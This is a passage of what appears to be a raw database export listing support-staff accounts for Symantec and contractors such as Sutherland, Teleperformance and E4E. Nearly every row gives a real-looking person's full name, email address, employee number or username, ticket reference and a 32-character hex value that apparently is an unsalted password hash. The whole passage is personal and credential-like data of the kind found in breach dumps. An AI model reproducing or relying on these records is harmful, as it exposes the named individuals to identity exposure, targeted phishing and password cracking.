0db-43f7-9afd-6be1a18d233b,<blank>,<blank>,AbdulKhader_MohammedRizwan@SUTH.COM,S
utherland,45784b7d99ebf76fe505fc0a78d99d48,Abdul Khader,<blank>,AbdulKhader_Moha
mmedRizwan,Mohammed Rizwan,NULL,NULL,NULL
f8e0-4a74-9df0-e459ff5b2d64,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,c0a06e2246c871ed6573d63a3fa0ae6e,Andrade,<blank>,075505,Eva,NULL,NULL,NUL
L
fed-427b-a969-9e040b5d998d,<blank>,<blank>,craig_lumen@symantec.com,Helpdesk,15d
f9e323670112518b80d88eeb8ce89,Lumen,<blank>,craig_lumen,Craig,NULL,NULL,NULL
3bb-4dd2-a206-6b91ecf33dca,<blank>,<blank>,AbigailRoseRamos_Garcia@SUTH.COM,Suth
erland,abe9362078636d2a4fcf5af7e79cf961,ChesterPidor,<blank>,AbigailRoseRamos_Ga
rcia,Mark,NULL,NULL,NULL
8e9c-4103-94b3-4c568c33166c,CRQ000000734342--vmd--17/07/2012,<blank>,tools_id@sy
mantec.suth.com,sutherland,f5f4c76e14fee6d247000a74f47ccc99,Banerjee,<blank>,227
955,Abhijeet,NULL,NULL,NULL
5b61-49b7-ba2e-099283805fef,CRQ000000349498 SP OCT 4 2011,000-0000,tools_id@syma
ntec.suth.com,Sutherland,7eaceceaa9069d94e155db689c604e1e,Vidhya K,<blank>,11514
2,Jaya,NULL,NULL,NULL
3e91-4b6e-ae13-02197869762b,CRQ000000467035 SP 22 Dec 2011,000-0000,dgalari@syma
ntec.teleperformance.gr,Teleperformance,c31871514e864e0b3eedcdec71c491a3,Galari,
<blank>,060961,Dana,NULL,NULL,NULL
a83-43fe-8321-458f5992fe7b,<blank>,<blank>,heema.bhaskar@e4e.com,E4E,a088b453a4a
00f73660a60d57aefcbdb,bhaskar,<blank>,heema_bhaskar,heema,NULL,NULL,NULL
3561-45e7-b470-3c9966bd8b68,CRQ000000349498 SP OCT 4 2011,000-0000,tools_id@syma
ntec.suth.com,Sutherland,d82593dd228d65785bdb962565f3f733,Rallos,<blank>,093242,
Wennielyn,NULL,NULL,NULL
44cc-43d5-9f18-6f1c6575b241,<blank>,<blank>,stanley_lawrans@symantec.com,CRQ0000
00692560 - PR - 12th June 2012,152f7ef22c4f72704a4a3655d5368c27,Madrazo,<blank>
,226644,Aidalynne Faye ,NULL,NULL,NULL
b408-4ee8-8d41-4e691085fc00,CRQ000000274363--VMD--10/06/2011,000-000,tools_id@sy
mantec.suth.com,Sutherland,04b8ca61da3201d33ecc4ab2aef04e2a,DeCastro,<blank>,117
032,NathaliePinky,NULL,NULL,NULL
eac-454c-b2f4-3249b1a16af0,<blank>,<blank>,Padmanabhan.Shekar@symantec.ts.e4e.co
m,E4E,07ce9dec038f8e7a921fa88b28c2e23c,Shekar,<blank>,Padmanabhan_Shekar,Padmana
bhan,NULL,NULL,NULL
f7fe-42f1-b34f-63f8566c6596,CRQ000000204567 - PR - 2/18/2011,<blank>,Biplabkumar
_Parida@symantec.com,<blank>,b2287e3875d4e7dbc3c18255e5846919,Parida,<blank>,113
027,Biplabkumar,NULL,NULL,NULL
9fe-476d-8a22-8cb5e1f884cf,<blank>,<blank>,vijay.sanjay@symantec.ts.e4e.com,E4E,
c01fccf9c1dbe5d310cbfe87bb5747da,Sanjay,<blank>,Vijay_Sanjay,Vijay ,NULL,NULL,N
ULL
3f31-4200-be16-01c262627790,CRQ000000671090--vmd--23/05/2012,<blank>,aileen_guic
o@suth.com,sutherland,7710a5fd52e47a080e82b16c7d6f8866,Guico,<blank>,225925,Aile
en,NULL,NULL,NULL
ebe-4772-bf2c-9df7447bdb46,<blank>,<blank>,Adarsh_C@SUTH.COM,Sutherland,0db1fe16
ea51cbbc86cb1e01142c4911,C,<blank>,Adarsh_C,Adarsh,NULL,NULL,NULL
2a63-4916-b718-055d23a82b34,CRQ000000671097--vmd--23/05/2012,<blank>,dennisedwar
d_macogue@suth.com,sutherland,819007bc3a90236e4631ffea1c983efc,Macogue,<blank>,2
25926,Dennis Edward,NULL,NULL,NULL
1d1f-4e9b-86b4-6a3a9f5042dc,sms 06.10.2010,<blank>,tools_id@symantec.suth.com,su
therland,6032ae7cc6c09a8758330a608069c267,Sridharan,<blank>,109207,Rambharath,NU
LL,NULL,NULL
1499-4d93-b139-95aaf61a8f71,CRQ000000671098--vmd--23/05/2012,<blank>,raffy_orono
s@suth.com,sutherland,6b50bb05ec1aa978b6fdf21bbc4f80d1,Oronos,<blank>,225927,Raf
fy,NULL,NULL,NULL
bf1-4e46-a667-4b608bb9bffa,<blank>,046496,keith_corradi@symantec.com,Helpdesk,1f
8b97e4c2e2ea5b3adb53a3695c326b,Corradi,<blank>,keith_corradi,Keith,NULL,NULL,NUL
L
0c59-4407-b64c-3716d577fbaa,<blank>,<blank>,stanley_lawrans@symantec.com,CRQ0000
00692568 - PR - 12th June 2012,8478441cc158b4e6fdb1bec9617f71c3,Tabuzo,<blank>,
226645,Kenneth,NULL,NULL,NULL
4dda-4928-86a6-25e252685a94,CRQ000000671099--vmd--23/05/2012,<blank>,marianastaz
ia_riego@suth.com,sutherland,19c8a7b6137cfa95b27d8a65b5a0f550,Riego,<blank>,2259
28,Maria Nastazia,NULL,NULL,NULL
d95e-4da9-aeea-45ad5a4d2ee2,"CRQ000000256418 - RJ-May 12, 2011",000-0000,tools_i
d@symantec.suth.com,Sutherland,8c5510cb834fbc9e1878bda3a2b71059,Sasi,<blank>,116
100,Syamkumar,NULL,NULL,NULL
d75-4fae-b470-bc0cf15e6620,<blank>,<blank>,AmberL_Poirier@suth.com,Sutherland,46
155538ac054899e85fa1c43bd2bd86,L Poirier,<blank>,AmberL_Poirier,Amber,NULL,NULL,
NULL
03d-471c-8032-c2fff31a1c0f,<blank>,<blank>,Ambily_Balaram@SUTH.COM,Sutherland,6b
1ad3c57bccd8b0402fc25cdfa0384e,Balaram,<blank>,Ambily_Balaram,Ambily,NULL,NULL,N
ULL
5700-40a8-b879-202dc8e6abe2,CRQ000000671100--vmd--23/05/2012,<blank>,maryjoy_rox
as@suth.com,sutherland,08cfbbfb752b44d2a3a28f27fbfbbb88,Roxas,<blank>,225929,Mar
y Joy,NULL,NULL,NULL
3673-41f4-8070-1d3050a835ac,CRQ000000671107--vmd--23/05/2012,<blank>,jennifer_ru
tor@suth.com,sutherland,5daba4e67b1e8a46c33bfcf7ff071d82,Rutor,<blank>,225930,Je
nnifer,NULL,NULL,NULL
9691-48fe-a4ec-a5ad6e1cee00,CRQ000000671108--vmd--23/05/2012,<blank>,raizasalba_
saiyadi@suth.com,sutherland,487d54ff0239a281916e04918ef46476,Saiyadi,<blank>,225
931,Raiza Salba,NULL,NULL,NULL
ea3-48a1-8888-cdd54f3361a0,<blank>,2630245,AndrewC_MacNaughton@SUTH.COM,Sutherla
nd,e1da3a408de4a079daa7197efd826b03,C MacNaughton,<blank>,AndrewC_MacNaughton,An
drew,NULL,NULL,NULL
596-4d5e-99de-d3231bcf0fe8,<blank>,<blank>,AndrewD_Pinette@SUTH.COM,Sutherland,8
b7589d226687736239213b02ab20285,D Pinette,<blank>,AndrewD_Pinette,Andrew,NULL,NU
LL,NULL
138-4e16-81bf-4ba5044644c7,<blank>,<blank>,harsha.hs@support.e4e.com,E4E,d805239
3c2650271633b5ffc9e350119,hs,<blank>,harsha_hs,harsha,NULL,NULL,NULL
c6cf-4f2a-a43a-2acff3cddc94,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,10d01038d57847b0a633e1582f7703f3,Ravi,<blank>,086104,Nidhin,NULL,NULL,NULL
6e76-44ff-b66a-4fd165d38c20,SRB 19.07.2010,INC213497,tools_id@symantec.suth.com,
Sutherland,78e4804ab6bf8b076c6104bf1f8e8861,Antony,<blank>,074988,Anish,NULL,NUL
L,NULL
121b-4384-a305-68dc8fd62f68,SRB 19.07.2010,INC213497,tools_id@symantec.suth.com,
Sutherland,5e060ba1868442d2f24d87566909fe27,A P,<blank>,074995,Jafer,NULL,NULL,N
ULL
5ed-49bf-bf65-6e37e259d51a,<blank>,<blank>,tools_id@symantec.suth.com,Sutherland
,44b805c3e25fee21021ae753cdf589c3,Kashmiri,<blank>,AbdulRaheem_Kashmiri,Abdul Ra
heem,NULL,NULL,NULL
5596-4691-aad8-dfc6f8422c62,VB=03/12/2010,<blank>,nh.symantec@teleperformance.co
m.ar,<blank>,d491baef1150db93065fd3eb6e43087f,Marcote,<blank>,111165,Gaston ,NUL
L,NULL,NULL
7a03-4a1a-b0e6-fc1d7db76e35,<blank>,<blank>,tools_id@symantec.suth.com,PM - 10/4
/2011 - CRQ000000349498,500f2617e753571ff953a4a279032b33,Varghese,<blank>,075637
,George Chudaladarampil,NULL,NULL,NULL
6d33-4046-bdc9-6f7716cb3606,DR_23_12_10,<blank>,aruna_DR@symantec.com,SYMANTEC,0
14e92e9325ea0955b7a2f52017588d0,DR,<blank>,111546,Aruna,NULL,NULL,NULL
e43a-43e6-aff7-be452d8717e7,CRQ000000462530 SP 21 Dec 2011,000-0000,tools_id@sym
antec.suth.com,Sutherland,0b9a12483a99849b2a6670adb40b89da,Cardino,<blank>,12324
6,Leriel Pinpin,NULL,NULL,NULL
9e2e-4b97-aecd-abd6ba44913b,CRQ000000462575 SP 21 Dec 2011,000-0000,tools_id@sym
antec.suth.com,Sutherland,cadbfbf287755138938be4548cf2f716,Paraoan,<blank>,12324
8,Rafael Manarin,NULL,NULL,NULL
96be-44fb-b0d5-6c09567cac7e,<blank>,<blank>,tools_id@symantec.suth.com,RM-21Dec-
2011-CRQ000000464908,156fc9047f06476ca9d77d86c46f22a2,Gumiran,<blank>,123253,Fra
nk Hermida,NULL,NULL,NULL
a19-4128-8de4-75284ff41a6b,<blank>,<blank>,Anand_PK1@SUTH.COM,Sutherland,a76ade0
8d4a24df388ba1075320f6fdf,P K,<blank>,Anand_PK1,Anand,NULL,NULL,NULL
9bee-4bc6-8723-9647b8f8819b,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,9e3dc272dc96980463330e3bf28a6161,Rajendran,<blank>,086222,Vignesh,NULL,NULL,NUL
L
68b-48f7-8eb5-0cd420fde8ba,<blank>,<blank>,Angel_Xavier@SUTH.COM,Sutherland,051e
e935ef2ecc04f7f495ff01344201,Xavier,<blank>,Angel_Xavier,Angel,NULL,NULL,NULL
26b3-4622-82fe-595c6d41ca09,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
607017 - PR - 27th March 2012,3c68d07c4f427377bde58b126451a6c7,Kamble,<blank>,22
3117,Chandrakant,NULL,NULL,NULL
58b-4440-b98c-9a520bcef8c9,<blank>,<blank>,Anita_Jose@SUTH.COM,Sutherland,bf8e44
027723788646bad5df6c6b54a2,Jose,<blank>,Anita_Jose,Anita,NULL,NULL,NULL
3d90-4de3-b866-671339f14fdc,CRQ000000274436--VMD--10/06/11,000-000,tools_id@syma
ntec.suth.com,Sutherland,0243eb7a9154b0b79a4e50dfb365b2ff,Uy,<blank>,117044,Reje
anCyril,NULL,NULL,NULL
75d7-4004-961b-b28b34c2107a,"CRQ000000830052 CLNP Oct 08,2012",000-0000,aristotl
e_guinto@symantec.com,Symantec,c9ca7a7f8fe8f223c1cc5eaa03d7a16e,Guinto,<blank>,2
30601,Aristotle,NULL,NULL,NULL
29c-4e0e-8b81-efed77d0ac40,<blank>,EMPROV,Suchit_Tripathy@symantec.com,Symantec,
9bab8135fbee6a97e14ec1d8e09c4a8d,Iyengar,<blank>,092618,Anand,NULL,NULL,NULL
82d-4d6e-8bcc-930cdbd4f331,<blank>,<blank>,Anne_Paul@SUTH.COM,Sutherland,c2aa8c0
123052e2e838e21f04475db5e,Paul,<blank>,Anne_Paul,Anne,NULL,NULL,NULL
af2-4776-9e62-bcad2758e244,<blank>,<blank>,AntonRoy_Petalcorin@SUTH.COM,Sutherla
nd,f86b0e4468931674f2ee5ca7a1e13d08,RoyPetalcorin,<blank>,AntonRoy_Petalcorin,An
ton,NULL,NULL,NULL
512-4ae2-9b01-72e386850ab9,<blank>,<blank>,Anurag_Singh@SUTH.COM,Sutherland,6f5d
f4929e8ead3ed9ae5e57f81762e7,Singh,<blank>,Anurag_Singh,Anurag,NULL,NULL,NULL
68b-4fa1-bdf2-fb26c93290cf,<blank>,<blank>,AparnaShashikant_Adsul@SUTH.COM,Suthe
rland,50c46353f6318290e931b9d969d817ea,Adsul,<blank>,AparnaShashikant_Adsul,Apar
na,NULL,NULL,NULL
7550-404d-b1f5-6af18d05e1c5,WS 16-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,cd48694b3b3feb6ff2e56fd6e9732d8c,Patankar,<blank>,075995,Amey,NULL,NULL,N
ULL
434-4b09-9866-2e72da35f62c,<blank>,<blank>,Archana_R@SUTH.COM,Sutherland,8d45321
fd65f153b46df21712a9f5458,R,<blank>,Archana_R,Archana,NULL,NULL,NULL
bc5-45c6-b039-b8accc288da4,<blank>,<blank>,Arean_Narrayan@SUTH.COM,Sutherland,c6
c006986be9b9859ff9ea62440d9604,Narrayan,<blank>,Arean_Narrayan,Arean,NULL,NULL,N
ULL
ddf-4266-97fa-9b7ec2f2c51b,<blank>,<blank>,Arif_Siddiqui@SUTH.COM,Sutherland,ee3
b9bd2535f7deb2efde7e3a60aaa14,Siddiqui,<blank>,Arif_Siddiqui,Arif,NULL,NULL,NULL
e470-4eea-b247-f337e196252e,RM - 19 dec 2011-CRQ000000459938,<blank>,tools_id@sy
mantec.suth.com,<blank>,6d987010f57e6f10399aaeb89ed8b5c1,Mayekar,<blank>,123221,
Richard,NULL,NULL,NULL
1936-440c-a309-197254af7933,CRQ000000367361 SP 20 OCT 2011,000-0000,sofia.rezgui
@teleperformance.nl,Teleperformance,3fdf2b02e235b758cbe7b7762989806f,Rezgui,<bla
nk>,121614,Sofia,NULL,NULL,NULL
905-40cd-ac1f-cdb87089c86b,<blank>,<blank>,Achuthaan_SR@SUTH.COM,Sutherland,537c
3b0945ac42485c947c0ff2f8f6d2,S R,<blank>,Achuthaan_SR,Achuthaan,NULL,NULL,NULL
6895-4921-b64b-a6043e68b394,CRQ000000107687,hvk 15 Aug 2010,Pranami_Rai@symantec
.com,Symantec,34b0ed4e08cb82f5a1be50b66b8e24ef,Rai,<blank>,107025,Pranami,NULL,N
ULL,NULL
5e3-43e9-906e-f30aceaf955d,<blank>,<blank>,Akhil_S@SUTH.COM,Sutherland,2a3f1038a
2392fd5bd378c9903f825fc,S,<blank>,Akhil_S,Akhil,NULL,NULL,NULL
d26-444f-b6ed-cd78287a8300,<blank>,<blank>,Albruni_A@suth.com,Sutherland,112d57f
16b834800ae1be690739a00bf,Abdul Basheer,<blank>,Albruni_A,Albruni,NULL,NULL,NULL
1a38-48a6-9c46-7d5956be800b,CRQ000000541983--vmd--06/02/2012,000-000,tools_id@sy
mantec.suth.com,Sutherland,eb2e3f7a0ec337f87cc1f2c50025ef59,Khaku,<blank>,124670
,Zibran,NULL,NULL,NULL
bf42-4a0f-8113-e84636ce8aaf,CRQ000000208183-vmd-25-02-11,000-000,tools_id@symant
ec.suth.com,Sutherland,93173c5a94af3dcddc65049844d46c64,Sasidharan,<blank>,11337
2,Ajai,NULL,NULL,NULL
152c-456f-8585-0d2390ee55f4,<blank>,<blank>,tools_id@symantec.suth.com,RM-21Dec-
2011-CRQ000000464938,769383fca2a43cdaaac1e01a26e6a3e8,Encabo,<blank>,123264,Jaim
e Feraer,NULL,NULL,NULL
cc0b-43c6-b4a8-1fbfdf17dc57,<blank>,<blank>,virginiajanuaryabiga@SPI.COM,PM - 8/
28/2012 - CRQ000000783727,e3aa2b435902215eed69671bdc82199a,Cruz,<blank>,229467,V
irginia January Abigail,NULL,NULL,NULL
8938-45c1-9730-4bf625f04cc5,CRQ000000712787--vmd--28/06/2012,<blank>,saurabh_jad
hav@suth.com,sutherland,c8f257ef71983de22170cd5f7c351dac,Jadhav,<blank>,227068,S
aurabh,NULL,NULL,NULL
d70d-4f58-9d8f-49deb81889ff,INC213497,nam 07/16/2010,tools_id@symantec.suth.com,
Sutherland,ed167d1432930b93aed15f1315b762e7,Bapat,<blank>,075779,Prateek,NULL,NU
LL,NULL
6cf-4329-8f61-5285f474074c,<blank>,<blank>,Anandan_N@SUTH.COM,Sutherland,1231f04
b4925b4ae1bd0f9c3b6485991,N,<blank>,Anandan_N,Anandan,NULL,NULL,NULL
355-404b-8235-ea18367b6227,<blank>,<blank>,AnandMohan_A@SUTH.COM,Sutherland,53d7
bce286e60c26b7c4ce15eade588f,A,<blank>,AnandMohan_A,Anand Mohan,NULL,NULL,NULL
3890-4a0d-82b0-79ed8480f94b,CRQ000000602026--vmd--22/03/2012,<blank>,sharonrose_
santos@Suth.com,Sutherland,d44a4ef762c07fbfdbead09e6f492ec0,Santos,<blank>,22263
4,Sharon Rose,NULL,NULL,NULL
876-471b-a29c-28143b50d800,<blank>,2630245,Arlene_Dallarie@suth.com,Sutherland,3
47e287663573f761c0dd2dd8fd93a90,Dallarie,<blank>,Arlene_Dallarie,Arlene,NULL,NUL
L,NULL
ac7d-46ee-89e3-eb7e8b92eb9d,CRQ000000602029--vmd--22/03/2012,<blank>,divinalonie
joy_saper@Suth.com,Sutherland,1b2f73875c245536bc5a6cd6ccd1f3e0,Sapero,<blank>,22
2635,Divina Lonie Joy,NULL,NULL,NULL
22b9-46eb-b6be-1255d2640d38,CRQ000000712787--vmd--28/06/2012,<blank>,harpreetsin
gh_manakt@suth.com,sutherland,47ea61e42473acd4e08f7f483cf6ceae,Manaktala,<blank>
,227069,Harpreet Singh,NULL,NULL,NULL
7903-4da1-a5de-35069938c44d,CRQ000000275389,000-000,tools_id@symantec.suth.com,S
utherland,c4e98c36f7cc8a0a12c1663ac45fede8,Sadasivam,<blank>,117049,Raghu,NULL,N
ULL,NULL
1170-4335-8c29-8c83468c9509,CRQ000000712787--vmd--28/06/2012,<blank>,yogesh_sing
h@suth.com,sutherland,ccc241ec6babf2e02e1fc2e1bf0164d7,Singh,<blank>,227070,Yoge
sh,NULL,NULL,NULL
59e-4c39-95f8-d46dd9ba4b8f,<blank>,<blank>,arunkumar_t4@suth.com,Sutherland,a2f6
dda09aa3317f9fe0679c03017ea0,T,<blank>,arunkumar_t4,Arun,NULL,NULL,NULL
c58-4b81-898a-45603a9f8564,<blank>,<blank>,ArunKumar_V1@SUTH.COM,Sutherland,ba52
63443ef37c7dc02a2521fbe9d3f7,V,<blank>,ArunKumar_V1,Arun Kumar,NULL,NULL,NULL
60bd-4f16-ba14-1d0ef807f883,CRQ000000712787--vmd--28/06/2012,<blank>,vivek_mandl
ik@suth.com,sutherland,b704e6f4ddff4fca594e9a296ac878ce,Mandlik,<blank>,227071,V
ivek,NULL,NULL,NULL
32d-4209-84d0-8bde38161843,<blank>,2614953,Arvin_Urbien@SUTH.COM,Sutherland,7196
029bf29d49200e44a9118b0aaa81,JayUrbien,<blank>,Arvin_Urbien,Arvin,NULL,NULL,NULL
aeb-4def-8fca-84c80a94bc80,<blank>,<blank>,AssumpthaPhiloRoshini_N@SUTH.COM,Suth
erland,14362f44f13e79b0c8e18fe9da385b44,N,<blank>,AssumpthaPhiloRoshini_N,Assump
tha Philo Roshini,NULL,NULL,NULL
c5c-4cbb-a6f8-8797b951347a,<blank>,<blank>,Aswathy_S2@SUTH.COM,Sutherland,f26c36
8ddfedce95b547db0b8ad4b8c8,S,<blank>,Aswathy_S2,Aswathy,NULL,NULL,NULL
5ed-4422-802c-a99f309d7263,<blank>,<blank>,Akash_Tanawade@SUTH.COM,Sutherland,2d
e11d8ee279399ba7054e01c5dca1c2,Tanawade,<blank>,Akash_Tanawade,Akash,NULL,NULL,N
ULL
4c12-4495-aa3b-3a7c66b50111,CRQ000000247862,<blank>,tools_id@symantec.suth.com,K
SC-04/28/2011,22fe2e951fc300a77b054945931d083c,Colona,<blank>,115585,Ricardo,NUL
L,NULL,NULL
552-4086-b3c5-09a2e04d30ec,<blank>,<blank>,steven_kanady@symantec.com,Helpdesk,e
df12186a2b2ca08062108b1c69a6fa9,Kanady,<blank>,steven_kanady,Steven,NULL,NULL,NU
LL
8e1-4509-8711-279bc664edad,<blank>,<blank>,Akshaya_J@SUTH.COM,Sutherland,f4a85ef
42225f516eb5765e3cdd66a98,J,<blank>,Akshaya_J,Akshaya,NULL,NULL,NULL
b7a1-463f-882d-4ce4df554399,CRQ000000247871,<blank>,tools_id@symantec.suth.com,K
SC-04/28/2011,0980cded84b015e7b4468b3269ca8b2c,Petargue,<blank>,115586,RoseJane,
NULL,NULL,NULL
f77-4fef-b452-8e8557ca7070,<blank>,<blank>,david_barclay@symantec.com,Helpdesk,a
d96ef3654ee7b9ec5fb4f22e0ad0791,Barclay,<blank>,david_barclay,David,NULL,NULL,NU
LL
57a-4dba-bffe-f185e6ae202d,<blank>,<blank>,Anushree_Ravi@SUTH.COM,Sutherland,872
b71e0648a26b0b421abab3a8a80cf,Ravi,<blank>,Anushree_Ravi,Anushree,NULL,NULL,NULL
47c-44b5-8f09-6cae3647476b,<blank>,<blank>,Archana_Harjot@SUTH.COM,Sutherland,34
02665e4fb24fbd3df7b552e9eb8368,Harjot,<blank>,Archana_Harjot,Archana,NULL,NULL,N
ULL
a5a-470d-b8c6-318711044ea7,<blank>,<blank>,Arif_Shaikh1@SUTH.COM,Sutherland,a8f5
b601f61a77515bee31172ed8c58b,Shaikh,<blank>,Arif_Shaikh1,Arif,NULL,NULL,NULL
77b-49b3-9522-3d861745435c,<blank>,2632350,tools_id@symantec.suth.com,Sutherland
,10740ada334d65d944c4f4250b503924,Choudhury,<blank>,Arijit_Choudhury,Arijit,NULL
,NULL,NULL
eb0-4366-8ee0-93465812affc,<blank>,<blank>,Arounachalam_C@SUTH.COM,Sutherland,26
3cd0972d13f63882b1babec8fab4d8,C,<blank>,Arounachalam_C,Arounachalam,NULL,NULL,N
ULL
a0b-4a0e-bd04-b118d56e0f59,<blank>,<blank>,v-6ashwa@mssupport.microsoft.com,Suth
erland,a1f9a8dcde0b0eed2bc9b3c547de25cf,M Wallis,<blank>,ashley_Wallis,Ashley,NU
LL,NULL,NULL
f358-4cce-90f4-85bae8553e75,CRQ000000460126 SP 21 Dec 2011,000-0000,tools_id@sym
antec.suth.com,Sutherland,e3564fa9d954e5557ed22fdd17f01c1e,Go,<blank>,123217,Mic
hael Mosqueda,NULL,NULL,NULL
775-49a3-9979-8da79a970606,<blank>,<blank>,tools_id@symantec.suth.com,Sutherland
,2d233a4f4bb11215a20c746e8c99ee1e,A,<blank>,AtaurRahaman_A,Ataur Rahaman,NULL,NU
LL,NULL
de8-4483-b288-e2099e8ac85d,<blank>,<blank>,Avril_Jin@suth.com,Sutherland,56b4c0e
21d74acce4c7e94c81e3aebea,Jin,<blank>,Avril_Jin,Avril,NULL,NULL,NULL
233-4051-aef6-ae46720a175d,<blank>,<blank>,Azarudeen_J@SUTH.COM,Sutherland,7d894
c0622acadf81886fb1fbd135a57,J,<blank>,Azarudeen_J,Azarudeen,NULL,NULL,NULL
3de-4514-b3d9-820ffcc4450a,<blank>,<blank>,Baby_VV@SUTH.COM,Sutherland,e4d4ff8f4
d81f0bed6146edd7566eeda,V V,<blank>,Baby_VV,Baby,NULL,NULL,NULL
0ac5-4de6-ad5e-817170b9ea5b,CRQ000000462558 SP 21 Dec 2011,000-0000,tools_id@sym
antec.suth.com,Sutherland,21f0780595d9c681438553de206086e3,Carino,<blank>,123247
,Ernest Christian Carpio,NULL,NULL,NULL
41a-4b06-967f-5cae39d9c1da,<blank>,<blank>,BalaKumar_M@SUTH.COM,Sutherland,a000e
bd83f1ddee6143808d19b5aed2f,M,<blank>,BalaKumar_M,Bala Kumar,NULL,NULL,NULL
bfbc-402d-900c-2cf051aee112,<blank>,<blank>,tools_id@symantec.suth.com,RM-21Dec-
2011-CRQ000000464902,8a4fc42f981803821ff3e71c4e374696,Cabral,<blank>,123251,Jo A
lvin Torrefranca,NULL,NULL,NULL
c29b-45ce-94ce-1163d6ae2fcc,<blank>,<blank>,tools_id@symantec.suth.com,RM-21Dec-
2011-CRQ000000464911,3bb410ff2b98cd1e1e2bdaa036758858,Madrid,<blank>,123255,Daph
ne Lara Morales,NULL,NULL,NULL
999-4ee4-a23e-abd1ff0083ac,<blank>,<blank>,BalramModak_B@SUTH.COM,Sutherland,f37
c266ade967424e1407f80f83ace6f,B,<blank>,BalramModak_B,Balram Modak,NULL,NULL,NUL
L
b30-46dc-acaf-89c0ac679838,<blank>,<blank>,BangaruBabu_K@SUTH.COM,Sutherland,708
8a8af91d0eb1c4c301e71cbe6b591,K,<blank>,BangaruBabu_K,Bangaru Babu,NULL,NULL,NUL
L
3d2-4b68-b60c-1d36fbd4634b,<blank>,2630245,Becky_Fenn@SUTH.COM,Sutherland,600e5d
35fe852b945a4558c63ceaf862,Fenn,<blank>,Becky_Fenn,Becky,NULL,NULL,NULL
93d-451e-b51e-d5f3c0303ad6,<blank>,EMPROV,symantec_2nd_maa@tp-tec.nl,Teleperform
ance Holland,fdffe79fdaa65322ed0e7a4ca9fd4130,VanKan,<blank>,092934,Roy,NULL,NUL
L,NULL
26b-4600-86f9-0e71167cfee2,<blank>,<blank>,BERNADETTE_COSTALES@SUTH.COM,Sutherla
nd,0e34e849152e1d7a2ca15f144cab7e50,Costales,<blank>,BERNADETTE_COSTALES,Bernade
tte,NULL,NULL,NULL
840-4dad-99cd-c22bed77b813,<blank>,<blank>,AneesAhmed_SK@SUTH.COM,Sutherland,b8d
cae9e8746a6ab05fb878d45894aca,SK,<blank>,AneesAhmed_SK,Anees Ahmed,NULL,NULL,NUL
L
1c6-4aeb-bf4c-72233292bfb8,<blank>,<blank>,Angela_Tiamzon@SUTH.COM,Sutherland,85
f4c720c86106fff2f9a3879d006c05,Tiamzon,<blank>,Angela_Tiamzon,Angela,NULL,NULL,N
ULL
15c-4722-a38e-91f5e910d135,<blank>,<blank>,ArunDaniel_Ravindran@SUTH.COM,Sutherl
and,ce3f4622074e967a1ca2d0cbb1c962cd,Ravindran,<blank>,ArunDaniel_Ravindran,Arun
Daniel,NULL,NULL,NULL
2d5-42b9-9290-a27048054d63,WS 16-07-2010,INC213497,Asha_G2@SUTH.COM,Sutherland,5
caef0378e42a3e6212bcd830c295cf7,G,<blank>,Asha_G2,Asha,NULL,NULL,NULL
8e9-4ab4-94dc-e3315a3a1317,<blank>,<blank>,tools_id@symantec.suth.com,Sutherland
,e8c06d73c5e81038e4dd7dc38f1d1c74,Ranpura,<blank>,BharatS._Ranpura,Bharat,NULL,N
ULL,NULL
f05-4d3d-a941-802ceb4e5c71,<blank>,<blank>,Bhavya_Ramdas@SUTH.COM,Sutherland,c77
ec4aad6c71b93d04b685763191b5d,Ramdas,<blank>,Bhavya_Ramdas,Bhavya,NULL,NULL,NULL
0e7-4225-9dc4-25a87ae46821,<blank>,<blank>,Bobet_Calma@suth.com,Sutherland,5c43f
0caf0c777e37e884d9fd7fd0eaf,Calma,<blank>,Bobet_Calma,Bobet,NULL,NULL,NULL
2c1-46d8-8161-ad7cddc8764f,<blank>,<blank>,Cameron_Fraser@suth.com,Sutherland,9d
7696945e4cbb48ff97b66b482a15f7,Fraser,<blank>,Cameron_Fraser,Cameron,NULL,NULL,N
ULL
f73-4408-92e2-6f7255456c4f,<blank>,<blank>,Carisa_Sanico@SUTH.COM,Sutherland,32c
c9026bb54b17a83a94bc334b286e4,Sanico,<blank>,Carisa_Sanico,Carisa,NULL,NULL,NULL
f96-4ce6-989d-6f39b1b8f839,<blank>,<blank>,Catherine_Orense@SUTH.COM,Sutherland,
c6f7d34eb880866e36f336386d00567b,Orense,<blank>,Catherine_Orense,Catherine,NULL,
NULL,NULL
61b-4074-bfbd-34a0676173a4,<blank>,<blank>,Anil_Ignatius@SUTH.COM,Sutherland,863
1d7b96e2152560d318dd0be04ed86,Ignatius,<blank>,Anil_Ignatius,Anil,NULL,NULL,NULL
f9e6-41d6-9391-216614e006b9,CRQ000000245645 PBP 26/04/2011,<blank>,tools_id@syma
ntec.suth.com,Sutherland,97a56aa05999eff1d8a8410572c41e79,Ahmed,<blank>,115137,A
brar,NULL,NULL,NULL
53e-47b5-be09-f9f829085591,<blank>,<blank>,Anne-Marie_Fogh@SUTH.COM,Sutherland,d
f0110e5ee2c1c791c475fed396e6c2b,Fogh,<blank>,AnneMarie_Fogh,Anne-Marie,NULL,NULL
,NULL
b7a-4b62-a5d9-73918590a5a8,<blank>,2633284,tools_id@symantec.suth.com,Sutherland
,bdb33bc62608cb45d30b9b24c0b44687,Shaikh,<blank>,Arshad_Shaikh1,Arshad,NULL,NULL
,NULL
36a-419f-b900-cc4f1ea74423,<blank>,<blank>,Arun_AK@SUTH.COM,Sutherland,6f98f2fc9
ee9573b2baf1ba8375605bf,A K,<blank>,Arun_AK,Arun,NULL,NULL,NULL
2ba9-4c84-9374-fde0020b07e4,04/06/2010 - SPJ,EMPROV,Tools_ID@Symantec.Suth.Com,S
utherland,5944514de8e6cd1d4ac23bbcdf11db75,Pawar,<blank>,105710,ManishSingh,NULL
,NULL,NULL
f568-4252-98c7-3cfe343b831b,sms 01.10,EMPROV,Tools_ID@Symantec.Suth.Com,Sutherla
nd,14ac61ce6e0472e4139e74cfaf3d67eb,Preeth,<blank>,105705,Sindhu,NULL,NULL,NULL
0ab-45d7-a82d-772afcdc0c73,<blank>,<blank>,AshwanthRaoBojanapati_S@SUTH.COM,Suth
erland,87f6e79ed8075022cd351e991c20d1dc,S,<blank>,AshwanthRaoBojanapati_S,Ashwan
th Rao Bojanapati,NULL,NULL,NULL
9d3-4b2c-99d5-4b486328915c,<blank>,<blank>,Avinash_Dubey@SUTH.COM,Sutherland,c76
